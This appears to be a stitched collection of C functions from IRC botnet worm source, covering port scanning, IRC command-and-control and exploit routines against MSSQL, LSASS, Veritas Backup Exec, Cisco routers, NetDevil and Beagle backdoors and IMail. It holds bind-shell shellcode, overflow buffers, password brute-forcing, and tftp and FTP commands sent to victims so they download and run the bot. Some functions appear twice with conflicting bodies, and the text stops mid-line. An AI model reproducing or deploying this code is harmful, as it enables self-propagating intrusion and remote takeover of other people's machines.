BOOL CiscoHTTP(EXINFO exinfo) { int ret,SocketFD; char buffer[4096]; if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons((unsigned short)exinfo.port); if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { if(fsend(SocketFD, HTTP_REQUEST, strlen(HTTP_REQUEST), 0) < 0) return FALSE; memset(buffer, 0, sizeof(buffer)); if((ret = frecv(SocketFD, buffer, sizeof(buffer), 0)) < 0) return FALSE; fclosesocket(SocketFD); if(ret < 5) return FALSE; if(strstr(buffer, "HTTP/1.0 200 OK") == NULL || strstr(buffer, "cisco") == NULL) return FALSE; char sendbuf[IRCLINE]; _snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(http)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; return TRUE; } return FALSE; }
// checks ip for open port DWORD WINAPI ScanConnectThread(LPVOID param) { static char sendbuf[IRCLINE]; SCAN scan = *((SCAN *)param); SCAN *scans = (SCAN *)param; scans->cgotinfo = TRUE; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)scan.port); ssin.sin_addr = scan.addy; SOCKET sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if(sock != INVALID_SOCKET) { DWORD err = fconnect(sock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)); threads[scan.threadnum].sock = sock; if (err != SOCKET_ERROR) { sprintf(sendbuf,"nzm (portscan.plg) »» IP: %s Port: %d is open.", finet_ntoa(scan.addy), scan.port); irc_privmsg(scan.sock, scan.chan, sendbuf, scan.notice); addlog(sendbuf); } } fclosesocket(sock); return 0; }
BOOL Cisco(EXINFO exinfo) { int ret,SocketFD; char buffer1[64],buffer2[64]; if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons((unsigned short)exinfo.port); if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { memset(buffer1, '\0', 64); memset(buffer2, '\0', 64); if ((ret = frecv(SocketFD, buffer1, 64, 0)) > 0) { ret = frecv(SocketFD, buffer1, 64, 0); fsend(SocketFD,"cisco\r",6,0); ret = frecv(SocketFD, buffer2, 64, 0); if( (memcmp(buffer2,"\r\nPass",6)) && !(memcmp(buffer1,"\r\n\r\nUser Access Verification\r\n\r\nPassword",40))) { char sendbuf[IRCLINE]; _snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(telnet)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; return TRUE; } } } return FALSE; }
bool ConnectShell(EXINFO exinfo) { int len; struct sockaddr_in shell_addr; char recvbuf[1024]; SOCKET sockfd; shell_addr.sin_family = AF_INET; shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list); shell_addr.sin_port = fhtons((unsigned short)exinfo.port);; if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == -1 ) return false; if (fconnect(sockfd, (struct sockaddr *)&shell_addr, sizeof(struct sockaddr)) == -1) return false; char mkdir_buff[400]=""; len = frecv(sockfd, recvbuf, 1024, 0); _snprintf(mkdir_buff, sizeof (mkdir_buff), "tftp -i %s get %s\n" "%s\n", GetIP(exinfo.sock),filename, filename); if (fsend(sockfd, mkdir_buff, sizeof(mkdir_buff)-1,0) == -1) return false; return true; }
unsigned long GetSpeed(char *szHost) { if(strlen(szHost) > MAXHOSTNAME) return 0; unsigned long lBufSize=NUM_KILOBYTES*1024; SOCKET sSock; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; if ((ssin.sin_addr.s_addr = ResolveAddress(szHost)) == 0) return 0; ssin.sin_port = fhtons(80); if ((sSock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return 0; if (fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return 0; char *szBuf=new char[lBufSize+3]; srand(GetTickCount()); int iChar=(char)(rand() % 255); memset(szBuf, 0, lBufSize+1 ); memset(szBuf, iChar, lBufSize ); unsigned long lStrLen=strlen(szBuf); char *szPostReq=new char[lBufSize+1002]; sprintf(szPostReq, "POST / HTTP/1.0\r\n" "Host: %s\r\n" "Content-Length: %d\r\n" "\r\n", szHost, lStrLen); strcat(szPostReq, szBuf); strcat(szPostReq, "\r\n"); lStrLen=strlen(szPostReq); unsigned long lStartMS=GetTickCount(); for(unsigned long l=0; l<lStrLen; l+=1024) { if(lStrLen-l < 1024) { if(fsend(sSock, szPostReq+l, lStrLen-l,0) == SOCKET_ERROR) { fclosesocket(sSock); free(szBuf); free(szPostReq); return 0; } } else { if(fsend(sSock, szPostReq+l, 1024,0) == SOCKET_ERROR) { fclosesocket(sSock); free(szBuf); free(szPostReq); return 0; } } } unsigned long lEndMS=GetTickCount(); float fElapsedS=(float)(lEndMS-lStartMS)/1000.0f; if(fElapsedS==0.0f) fElapsedS=1.0f; float fBytesPS=(float)lStrLen/fElapsedS; float fKBytesPS=fBytesPS/1024.0f; float fBitsPS=fBytesPS*8.0f; float fKBitsPS=fBitsPS/1024.0f; fclosesocket(sSock); free(szBuf); free(szPostReq); return (unsigned long)fKBitsPS; }
BOOL AdvPortOpen(unsigned long ip, unsigned int port, unsigned int delay) { SOCKADDR_IN sin; unsigned long blockcmd=1; SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0); if (sock == INVALID_SOCKET) return FALSE; sin.sin_family = AF_INET; sin.sin_addr.S_un.S_addr = ip; sin.sin_port = fhtons((unsigned short)port); fioctlsocket(sock,FIONBIO,&blockcmd); fconnect(sock,(LPSOCKADDR)&sin,sizeof(sin)); TIMEVAL timeout; timeout.tv_sec=delay; timeout.tv_usec=0; FD_SET rset; FD_ZERO(&rset); FD_SET(sock,&rset); int i = fselect(0,0,&rset,0,&timeout); fclosesocket(sock); if (i<=0) return FALSE; else return TRUE; }
SOCKET CreateSock(char *host, unsigned short port) { SOCKET ssock; if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) return INVALID_SOCKET; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(port); IN_ADDR in; in.s_addr = finet_addr(host); LPHOSTENT Hostent = NULL; if (in.s_addr == INADDR_NONE) Hostent = fgethostbyname(host); //hostname if (Hostent == NULL && in.s_addr == INADDR_NONE) //error dns return INVALID_SOCKET; ssin.sin_addr = ((Hostent != NULL)?(*((LPIN_ADDR)*Hostent->h_addr_list)):(in)); if (fconnect(ssock, (LPSOCKADDR) &ssin, sizeof(ssin)) == SOCKET_ERROR) { fclosesocket(ssock); return INVALID_SOCKET; } return (ssock); }
BOOL thcsql(char *target, void* conn,EXINFO exinfo) { IRC* irc=(IRC*)conn; unsigned int sock,rc; struct sockaddr_in sqludp; if ((sock=fsocket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET) return FALSE; sqludp.sin_family=AF_INET; sqludp.sin_addr.s_addr=finet_addr(exinfo.ip); sqludp.sin_port=fhtons(exinfo.port); if ((rc=fconnect(sock, (struct sockaddr *)&sqludp, sizeof(struct sockaddr_in)))=SOCKET_ERROR) { if(rc==0) { fsend(sock,badbuffer,sizeof(badbuffer)-1,0); Sleep(1000); if (ConnectShell(exinfo, 31337)) { exploit[exinfo.exploit].stats++; if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); } } fshutdown(sock,1); fclosesocket(sock); return FALSE; }
BOOL lsass(EXINFO exinfo) { int len; SOCKET sockfd; int dport = 44444; struct sockaddr_in their_addr; char recvbuf[1600]; { their_addr.sin_family = AF_INET; their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list); /* ^ Server's address */ their_addr.sin_port = fhtons((unsigned short)exinfo.port); /* connect to the server */ if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; if (fconnect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == SOCKET_ERROR) return FALSE; if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, 1600, 0); if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, 1600, 0); if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, 1600, 0); switch (recvbuf[68]) { case '1': // win XP if (!Exploit2( exinfo, sockfd, 0 )) return FALSE; break; case '0': //win 2k if (!Exploit2( exinfo, sockfd, 2 )) if (!Exploit2( exinfo, sockfd, 1)) return FALSE; break; default: return FALSE; } } return TRUE; }
BOOL NetDevil(EXINFO exinfo) { char buffer[IRCLINE]; DWORD mode=0; SOCKET ssock; if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) return FALSE; SOCKADDR_IN sin; sin.sin_family = AF_INET; sin.sin_addr.s_addr = finet_addr(exinfo.ip); sin.sin_port = fhtons(exinfo.port); fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin)); fioctlsocket(ssock,FIONBIO,&mode); for (int i=0; passwords[i]; i++) { Sleep(50); memset(buffer,0,sizeof(buffer)); if (NetDevil_Receive(ssock) == -1) break; if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0) break; if (strcmp(buffer,"passed") == 0) { sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]); fsend(ssock, buffer, strlen(buffer), 0); if (NetDevil_Upload(exinfo.ip,ssock) == 1) { fclosesocket(ssock); _snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1]))); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; return TRUE; } break; } if (strcmp(buffer,"pass_pleaz") == 0) { memset(buffer,0,sizeof(buffer)); sprintf(buffer,"pass_pleaz%s",passwords[i]); fsend(ssock,buffer ,strlen(buffer), 0); continue; } else break; } fclosesocket(ssock); return FALSE; }
int connect_no_timeout(unsigned int sockfd, const struct sockaddr *addr, int addrlen, struct timeval *timeout) { int error = 0, ret; int error_len; fd_set rset, wset; if (timeout == NULL) { /* blocking mode */ return connect(sockfd, addr, addrlen); } /* Set the socket to be non-blocking */ SET_SOCK_BLOCK(sockfd, 0); fconnect(sockfd, addr, addrlen); FD_ZERO(&rset); FD_SET(sockfd, &rset); FD_ZERO(&wset); FD_SET(sockfd, &wset); if ((ret = fselect(sockfd + 1, &rset, &wset, NULL, timeout)) == 0) { return SOCKET_ERROR; } if (ret == SOCKET_ERROR) { return SOCKET_ERROR; } if(FD_ISSET(sockfd, &rset) || FD_ISSET(sockfd, &wset)) { error_len = sizeof(error); if (getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (char *) &error, &error_len) == SOCKET_ERROR) { return SOCKET_ERROR; } } else { /* whoops: sockfd has disappeared */ return SOCKET_ERROR; } /* Set the socket back to blocking ioctlsocket(sockfd, FIONBIO, &block); */ if (error) { return SOCKET_ERROR; } return 0; }
BOOL SkonkShell( EXINFO exinfo, unsigned int bindport ) { int len; char recvbuf[1024]; SOCKET sockfd; SOCKADDR_IN shell_addr; memset(&shell_addr, 0, sizeof(shell_addr)); shell_addr.sin_family = AF_INET; shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); shell_addr.sin_port = fhtons(bindport); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET ) return false; if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) return false; char mkdir_buff[400]; len = frecv(sockfd, recvbuf, 1024, 0); ////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////// #ifndef NO_TFTPD _snprintf(mkdir_buff, sizeof (mkdir_buff), "tftp -i %s get %s &%s\r\n", GetIP( exinfo.sock ),filename, filename); #endif ////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////// if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; Sleep(500); _snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename); if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; len = frecv(sockfd, recvbuf, 1024, 0); fclosesocket(sockfd); return true; }
DWORD WINAPI IRC_Connect(LPVOID param) { IRC irc = *((IRC *)param); IRC *ircs = (IRC *)param; ircs->gotinfo = TRUE; int rval = 0; SOCKADDR_IN ssin; while (1) { memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(irc.port); if ((ssin.sin_addr.s_addr=ResolveAddress(irc.host)) == 0) break; memset(threads[irc.threadnum].nick, 0, sizeof(threads[irc.threadnum].nick)); rndnick(threads[irc.threadnum].nick, nicktype, nickprefix); if ((threads[irc.threadnum].sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { Sleep(5000); continue; } if (fconnect(threads[irc.threadnum].sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { fclosesocket(threads[irc.threadnum].sock); FlushDNSCache(); Sleep(5000); continue; } #ifdef DEBUG_CONSOLE printf("Bot started and connect to %s.\n", irc.host); #endif addlogv("[MAIN]: Connected to %s.", irc.host); rval = IRC_ReceiveLoop(threads[irc.threadnum].sock, irc.host, irc.channel, irc.chanpass, threads[irc.threadnum].nick, irc.clone); fclosesocket(threads[irc.threadnum].sock); if (rval == 0) continue; else if (rval == 1) { Sleep(900000); continue; } else if (rval == 2) break; } clearthread(irc.threadnum); return rval; }
int check_os(char *host,unsigned short target_port, int *sp) { SOCKET sSock; if ((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(host); ssin.sin_port = fhtons((unsigned short)target_port); if (fconnect(sSock,(LPSOCKADDR)&ssin,sizeof(ssin)) != SOCKET_ERROR) { char recv_buff[5000]; memset(recv_buff,0,sizeof(recv_buff)); TIMEVAL timeout; timeout.tv_sec = 5; timeout.tv_usec = 0; fd_set fd; FD_ZERO(&fd); FD_SET(sSock, &fd); if (fselect(0, &fd, NULL, NULL, &timeout) > 0) { if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) { if (fsend(sSock,(const char *)send_buff,strlen((const char*)send_buff),0) > 0) { if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) { fclosesocket(sSock); *sp=atoi(&recv_buff[37]); if (recv_buff[8] == 5 && recv_buff[12] == 0) return ID_WIN2K; else if (recv_buff[8] == 5 && recv_buff[12] == 1) return ID_WINXP; else if (recv_buff[8] == 5 && recv_buff[12] == 2) return ID_WIN2K3; else if (recv_buff[8] == 4) return ID_WINNT; else return ID_UNKNOWN; } } } } } fclosesocket(sSock); } return 1; }
BOOL Beagle(EXINFO exinfo) { char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT]; BOOL success = FALSE; WSADATA WSAData; if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) return FALSE; SOCKET sSock; if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons(exinfo.port); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2)); if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) { if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) { GetModuleFileName(0, botfile, sizeof(botfile)); _splitpath(botfile, NULL, NULL, fname, ext); _snprintf(botfile, sizeof(botfile), "%s%s", fname, ext); _snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile); if(fsend(sSock, buffer, sizeof(buffer), 0)) success = TRUE; } } } } fclosesocket(sSock); fWSACleanup(); if (success) { _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; } return (success); }
bool ConnectShell2(EXINFO exinfo) { int len; char recvbuf[1024]; SOCKET sockfd; SOCKADDR_IN shell_addr; memset(&shell_addr, 0, sizeof(shell_addr)); shell_addr.sin_family = AF_INET; shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list); shell_addr.sin_port = fhtons(xport);; if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET ) return false; if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) return false; char mkdir_buff[400]; len = frecv(sockfd, recvbuf, 1024, 0); #ifndef NO_TFTPD _snprintf(mkdir_buff, sizeof (mkdir_buff), "tftp -i %s get %s\r\n", GetIP(exinfo.sock),filename, filename); #endif #ifndef NO_FTPD _snprintf(mkdir_buff, sizeof (mkdir_buff), "echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s\r\n", GetIP(exinfo.sock),FTP_PORT, filename, filename); #endif if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; Sleep(500); _snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename); if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; len = frecv(sockfd, recvbuf, 1024, 0); fclosesocket(sockfd); return true; }
bool ConnectShell2(EXINFO exinfo) { int len; char recvbuf[1024]; SOCKET sockfd; SOCKADDR_IN shell_addr; memset(&shell_addr, 0, sizeof(shell_addr)); shell_addr.sin_family = AF_INET; shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); shell_addr.sin_port = fhtons(7777); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET ) return false; if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) return false; char mkdir_buff[400]; len = frecv(sockfd, recvbuf, 1024, 0); _snprintf(mkdir_buff, sizeof (mkdir_buff), "echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n", GetIP(exinfo.sock),FTP_PORT); if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; Sleep(500); _snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename); if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; len = frecv(sockfd, recvbuf, 1024, 0); fclosesocket(sockfd); return true; }
// FIX ME: This could probably be (re)moved, its just from the original exploit layout. int WksSocket(int tm, int port, const char *WksIP) { unsigned int sock; unsigned long y = 1; struct timeval timeout; struct sockaddr_in target_ip; if ((sock = fsocket(AF_INET, SOCK_STREAM, 0)) == -1) return -1; target_ip.sin_family = AF_INET; target_ip.sin_addr.s_addr = finet_addr(WksIP); target_ip.sin_port = fhtons(port); fioctlsocket(sock,FIONBIO,&y); timeout.tv_sec=tm; timeout.tv_usec = 0; if (fconnect(sock, (struct sockaddr *)&target_ip, sizeof(target_ip)) == -1) { fd_set writefds; fd_set exceptfds; FD_ZERO (&writefds); FD_ZERO (&exceptfds); FD_SET (sock, &writefds); FD_SET (sock, &exceptfds); fselect(0, NULL, &writefds, &exceptfds, &timeout); //if (!FDI_ISSET (sock, &writefds)) if (!__fWSAFDIsSet(sock, &writefds)) { fclosesocket(sock); return -1; } y=0; fioctlsocket(sock,FIONBIO,&y); } return sock; }
bool veritasbackupserver(EXINFO exinfo) { SOCKET sock; if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false; SOCKADDR_IN sin; memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = fhtons((unsigned short)exinfo.port); sin.sin_addr.s_addr = finet_addr(exinfo.ip); char payload[800]; char v91sp0sp1[]="\xFF\x50\x11\x40"; char esisp0sp1[]="\xA1\xFF\x42\x01"; memcpy(&talk[37], &v91sp0sp1, 4); memcpy(&talk[72], &esisp0sp1, 4); //os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0"; strcpy(payload,veritassc); if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false; if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false; Sleep(10); for (int i=0; i < 7;i++) { if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false; Sleep(10); } Sleep(1000); fclosesocket(sock); ConnectShell(exinfo,101); return (AddEx(exinfo,true)); }
bool MSSQLResolution(EXINFO exinfo) { /* win32_bind - EXITFUNC=process LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */ unsigned char scode[] = "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97\x27\xc8" "\x3e\x83\xeb\xfc\xe2\xf4\x6b\x4d\x23\x73\x7f\xde\x37\xc1\x68\x47" "\x43\x52\xb3\x03\x43\x7b\xab\xac\xb4\x3b\xef\x26\x27\xb5\xd8\x3f" "\x43\x61\xb7\x26\x23\x77\x1c\x13\x43\x3f\x79\x16\x08\xa7\x3b\xa3" "\x08\x4a\x90\xe6\x02\x33\x96\xe5\x23\xca\xac\x73\xec\x16\xe2\xc2" "\x43\x61\xb3\x26\x23\x58\x1c\x2b\x83\xb5\xc8\x3b\xc9\xd5\x94\x0b" "\x43\xb7\xfb\x03\xd4\x5f\x54\x16\x13\x5a\x1c\x64\xf8\xb5\xd7\x2b" "\x43\x4e\x8b\x8a\x43\x7e\x9f\x79\xa0\xb0\xd9\x29\x24\x6e\x68\xf1" "\xae\x6d\xf1\x4f\xfb\x0c\xff\x50\xbb\x0c\xc8\x73\x37\xee\xff\xec" "\x25\xc2\xac\x77\x37\xe8\xc8\xae\x2d\x58\x16\xca\xc0\x3c\xc2\x4d" "\xca\xc1\x47\x4f\x11\x37\x62\x8a\x9f\xc1\x41\x74\x9b\x6d\xc4\x74" "\x8b\x6d\xd4\x74\x37\xee\xf1\x4f\xd9\x62\xf1\x74\x41\xdf\x02\x4f" "\x6c\x24\xe7\xe0\x9f\xc1\x41\x4d\xd8\x6f\xc2\xd8\x18\x56\x33\x8a" "\xe6\xd7\xc0\xd8\x1e\x6d\xc2\xd8\x18\x56\x72\x6e\x4e\x77\xc0\xd8" "\x1e\x6e\xc3\x73\x9d\xc1\x47\xb4\xa0\xd9\xee\xe1\xb1\x69\x68\xf1" "\x9d\xc1\x47\x41\xa2\x5a\xf1\x4f\xab\x53\x1e\xc2\xa2\x6e\xce\x0e" "\x04\xb7\x70\x4d\x8c\xb7\x75\x16\x08\xcd\x3d\xd9\x8a\x13\x69\x65" "\xe4\xad\x1a\x5d\xf0\x95\x3c\x8c\xa0\x4c\x69\x94\xde\xc1\xe2\x63" "\x37\xe8\xcc\x70\x9a\x6f\xc6\x76\xa2\x3f\xc6\x76\x9d\x6f\x68\xf7" "\xa0\x93\x4e\x22\x06\x6d\x68\xf1\xa2\xc1\x68\x10\x37\xee\x1c\x70" "\x34\xbd\x53\x43\x37\xe8\xc5\xd8\x18\x56\xe9\xff\x2a\x4d\xc4\xd8" "\x1e\xc1\x47\x27\xc8\x3e"; unsigned long targets[]={ 0x42b48774 /*MSQL 2000 / MSDE*/ }; unsigned short sqlport = 1434; char *request=(char*)malloc(1+800+5+1+sizeof(scode)); //\x68:888 => push dword 0x3838383a memcpy(request+0, "\x04", 1); memset(request+1, 0x90, 800); memcpy(request+801, "\x68:888", 5); memcpy(request+806, "\x90", 1); memcpy(request+807, scode, sizeof(scode)); //return address of jmp esp memcpy(request+97, (char*)&targets[0], 4); //takes us right here, with 8 bytes available memcpy(request+101, "\xeb\x69\xeb\x69", 8); //write to thread storage space ala msrpc memcpy(request+109, "\xcc\xe0\xff\x7f", 4); //0x7ffde0cc memcpy(request+113, "\xcc\xe0\xff\x7f", 4); //the payload starts here memset(request+117, 0x90, 100); memcpy(request+217, scode, sizeof(scode)); SOCKET s; if ((s=fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == INVALID_SOCKET) return false; SOCKADDR_IN ssin; ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons((unsigned short)sqlport); if (fconnect(s, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return false; if (fsend(s, request, strlen(request), 0) == SOCKET_ERROR) return false; fclosesocket(s); //automatically restart sql server - thanks SK! s=fsocket(AF_INET, SOCK_STREAM, 0); memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons((unsigned short)4444); if(fconnect(s, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return false; char cmd_buff[400]; _snprintf(cmd_buff, sizeof(cmd_buff), "net start sqlserveragent & " "tftp -i %s GET %s & " "%s", exinfo.myip, filename, filename); if(fsend(s,(char*)cmd_buff, strlen(cmd_buff),0) == SOCKET_ERROR) return false; fclosesocket(s); return (AddEx(exinfo,true)); }
BOOL iMail( char *target, void* conn,EXINFO exinfo ) { IRC* irc=(IRC*)conn; char szBanner[512];//, szShellcode[512]; int iRemoteTarget; int ibindsize=405; SOCKET sSocket; if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Beginning attack on %s",exinfo.ip);Sleep(1500); SOCKADDR_IN sinSockAddrIn; memset(&sinSockAddrIn, 0, sizeof(sinSockAddrIn)); sinSockAddrIn.sin_family = AF_INET; sinSockAddrIn.sin_addr.s_addr = finet_addr(exinfo.ip); sinSockAddrIn.sin_port = fhtons(exinfo.port); if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Initializing IP and port for %s:%d",exinfo.ip,exinfo.port);Sleep(1500); if(!(sSocket = fWSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL))) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Creating Socket for %s",exinfo.ip);Sleep(1500); if(fconnect(sSocket, (LPSOCKADDR)&sinSockAddrIn, sizeof(sinSockAddrIn)) == SOCKET_ERROR) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Connecting to socket for %s",exinfo.ip);Sleep(1500); if(frecv(sSocket, szBanner, sizeof(szBanner), 0) == SOCKET_ERROR) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Getting Banner for %s",exinfo.ip);Sleep(1500); if (strstr(szBanner,"IMail 7.04")) iRemoteTarget = 0; else if (strstr(szBanner,"IMail 7.05")) iRemoteTarget = 1; else if (strstr(szBanner,"IMail 7.06")) iRemoteTarget = 2; else if (strstr(szBanner,"IMail 7.07")) iRemoteTarget = 2; else if (strstr(szBanner,"IMail 7.10")) iRemoteTarget = 3; else if (strstr(szBanner,"IMail 7.11")) iRemoteTarget = 4; else if (strstr(szBanner,"IMail 7.12")) iRemoteTarget = 5; else if (strstr(szBanner,"IMail 7.13")) iRemoteTarget = 6; else if (strstr(szBanner,"IMail 7.14")) iRemoteTarget = 6; else if (strstr(szBanner,"IMail 7.15")) iRemoteTarget = 6; else if (strstr(szBanner,"IMail 8.00")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.01")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.02")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.03")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.04")) iRemoteTarget = 8; else if (strstr(szBanner,"IMail 8.05")) iRemoteTarget = 9; else if (strstr(szBanner,"IMail 8.10")) iRemoteTarget = 10; else if (strstr(szBanner,"IMail 8.11")) iRemoteTarget = 12; else if (strstr(szBanner,"IMail 